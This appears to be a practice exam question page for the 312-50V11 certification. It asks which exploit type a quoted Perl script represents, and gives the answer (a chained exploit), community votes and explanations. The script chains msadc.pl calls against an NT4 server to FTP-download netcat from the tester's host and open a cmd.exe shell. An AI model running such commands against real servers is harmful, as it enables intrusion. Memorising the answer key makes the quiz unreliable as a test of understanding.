312-50V11 · Question #303
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On furth
The correct answer is B. A chained exploit. The script chains multiple sequential calls to msadc.pl to build an FTP command file and execute it, which is the definition of a chained exploit.
Question
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C "echo open $your >testfile""); system("perl msadc.pl -h $host -C "echo $user>>testfile""); system("perl msadc.pl -h $host -C "echo $pass>>testfile""); system("perl msadc.pl -h $host -C "echo bin>>testfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>testfile""); system("perl msadc.pl -h $host -C "echo get hacked.html>>testfile""); ("perl msadc.pl -h $host -C "echo quit>>testfile""); system("perl msadc.pl -h $host -C "ftp -s:testfile""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); Which exploit is indicated by this script?
Options
- AA buffer overflow exploit
- BA chained exploit
- CA SQL injection exploit
- DA denial of service exploit
How the community answered
(23 responses)- A4% (1)
- B70% (16)
- C9% (2)
- D17% (4)
Why each option
The script chains multiple sequential calls to msadc.pl to build an FTP command file and execute it, which is the definition of a chained exploit.
A buffer overflow exploit overwrites adjacent memory to redirect execution flow - no memory boundary manipulation is present in these chained FTP command sequences.
A chained exploit combines multiple steps or vulnerability invocations in sequence where each step depends on the previous to ultimately achieve a goal beyond any single step. Here, repeated msadc.pl calls progressively write FTP commands into 'testfile', then FTP is invoked with that script to download netcat (nc.exe) and other payloads - creating a clear chain of dependent exploitation steps.
A SQL injection exploit injects malicious SQL syntax into database queries via unsanitized input - no database interaction or SQL manipulation is occurring here.
A denial of service exploit aims to exhaust resources and make a service unavailable - this script is focused on gaining access and downloading tools, not disrupting availability.
Concept tested: Identifying chained exploit attack techniques
Topics
Community Discussion
No community discussion yet for this question.